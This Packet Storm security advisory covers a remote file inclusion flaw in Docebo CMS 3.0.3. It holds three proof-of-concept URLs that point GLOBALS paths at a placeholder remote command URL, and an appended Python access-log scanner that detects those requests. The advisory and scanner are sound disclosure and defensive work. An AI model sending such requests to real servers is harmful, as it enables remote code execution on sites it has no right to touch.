DoceboCMS303.txt

2006-06-12T00:00:00
ID PACKETSTORM:47246
Type packetstorm
Reporter Federico Fazzi
Modified 2006-06-12T00:00:00

Description

-----------------------------------------------------  
Advisory id: FSA:007  
  
Author: Federico Fazzi  
Date: 09/06/2006, 6:10  
Synthesis: Docebo CMS 3.0.3, Remote command execution  
Type: high  
Product: http://www.docebolms.org/  
Patch: unavailable  
-----------------------------------------------------  
  
  
1) Description:  
  
Error occurred in news_class.php,  
  
include_once($GLOBALS['where_framework']."/lib/lib.listview.php");  
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");  
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");  
  
Error occurred in content_class.php,  
  
include_once($GLOBALS['where_framework']."/lib/lib.listview.php");  
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");  
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");  
  
Error occurred in util.media.php,  
  
include_once($GLOBALS["where_cms"]."/admin/modules/media/media_class.php");  
  
Users can include a remote file because  
$GLOBALS['where_framework'] and $GLOBALS['where_cms']  
are not sanitized before they are used in the include_once() paths.  
  
2) Proof of concept:  
  
http://example/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url]  
http://example/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url]  
http://example/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url]  
  
3) Solution:  
  
Include the file in which the $GLOBALS[*] values are declared.  
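A log check for the request pattern shown in section 2, added here as an example and not part of the original advisory. It assumes combined-format web server access logs; the sample lines are constructed, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, unquote

# Script paths and GLOBALS keys taken from the advisory.
AFFECTED = {
    "admin/modules/news/news_class.php": "where_framework",
    "admin/modules/content/content_class.php": "where_framework",
    "admin/modules/block_media/util.media.php": "where_cms",
}
# Client, request target and status of a combined-format log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A query parameter named GLOBALS[key], checked after URL decoding.
GLOBALS_KEY = re.compile(r"^GLOBALS\[(\w+)\]$")


def globals_overrides(target):
    """Return the GLOBALS keys a request target tries to set via its query string."""
    keys = []
    for pair in urlsplit(target).query.split("&"):
        name = unquote(pair.split("=", 1)[0])  # catches GLOBALS%5B...%5D too
        m = GLOBALS_KEY.match(name)
        if m:
            keys.append(m.group(1))
    return keys


def scan(lines):
    """Yield (client, script, key, status) for requests matching the advisory."""
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        path = unquote(urlsplit(target).path)
        for script, key in AFFECTED.items():
            if path.endswith("/" + script) and key in globals_overrides(target):
                yield client, script, key, status


# Constructed sample log lines (documentation addresses, placeholder values).
SAMPLE = [
    '192.0.2.10 - - [12/Jun/2006:10:00:01 +0000] "GET /doceboCms/index.php?mn=news HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Jun/2006:10:02:17 +0000] "GET /doceboCms/admin/modules/news/news_class.php?GLOBALS[where_framework]=PLACEHOLDER HTTP/1.1" 200 312',
    '192.0.2.44 - - [12/Jun/2006:10:02:19 +0000] "GET /doceboCms/admin/modules/block_media/util.media.php?GLOBALS%5Bwhere_cms%5D=PLACEHOLDER HTTP/1.0" 200 97',
    '192.0.2.77 - - [12/Jun/2006:10:05:40 +0000] "GET /doceboCms/admin/modules/content/content_class.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit shows that the request was made, not that the include succeeded; the logged status only says how the server answered.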